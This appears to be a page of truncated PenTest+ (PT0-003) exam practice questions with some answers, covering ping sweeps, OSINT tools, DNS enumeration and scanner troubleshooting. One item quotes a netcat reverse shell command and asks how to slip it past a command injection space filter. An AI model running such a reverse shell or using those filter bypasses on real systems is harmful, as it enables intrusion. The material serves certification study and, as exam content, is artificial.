PT0-003 exam

A penetration tester is working on a security assessment of a mobile application that was developed in-house for local use by a hospital. The hospital and its customers are very concerned about disclosure of information. Which of the following tasks should the penetration tester do first?A . Set up Drozer...

A penetration tester wants to use the following Bash script to identify active servers on a network: 1 network_addr="192.168.1" 2 for h in {1..254}; do 3 ping -c 1 -W 1 $network_addr.$h > /dev/null 4 if [ $? -eq 0 ]; then 5 echo "Host $h is up" 6 else...

A penetration tester attempts to run an automated web application scanner against a target URL. The tester validates that the web page is accessible from a different device. The tester analyzes the following HTTP request header logging output: 200; GET /login.aspx HTTP/1.1 Host: foo.com; User-Agent: Mozilla/5.0 200; GET /login.aspx HTTP/1.1...

During a penetration test, a junior tester uses Hunter.io for an assessment and plans to review the information that will be collected. Which of the following describes the information the junior tester will receive from the Hunter.io tool?A . A collection of email addresses for the target domain that is...

A penetration tester is trying to bypass a command injection blocklist to exploit a remote code execution vulnerability. The tester uses the following command: nc -e /bin/sh 10.10.10.16 4444 Which of the following would most likely bypass the filtered space character?A . ${IFS}B . %0aC . + *D . %20View...

Which of the following describes the process of determining why a vulnerability scanner is not providing results?A . Root cause analysisB . Secure distributionC . Peer reviewD . Goal reprioritizationView AnswerAnswer: A Explanation: Root cause analysis involves identifying the underlying reasons why a problem is occurring. In the context of...

During a security audit, a penetration tester wants to run a process to gather information about a target network's domain structure and associated IP addresses. Which of the following tools should the tester use?A . DnsenumB . NmapC . NetcatD . WiresharkView AnswerAnswer: A Explanation: Dnsenum is a tool specifically...

A penetration tester presents the following findings to stakeholders: Control | Number of findings | Risk | Notes Encryption | 1 | Low | Weak algorithm noted Patching | 8 | Medium | Unsupported systems System hardening | 2 | Low | Baseline drift observed Secure SDLC | 10 |...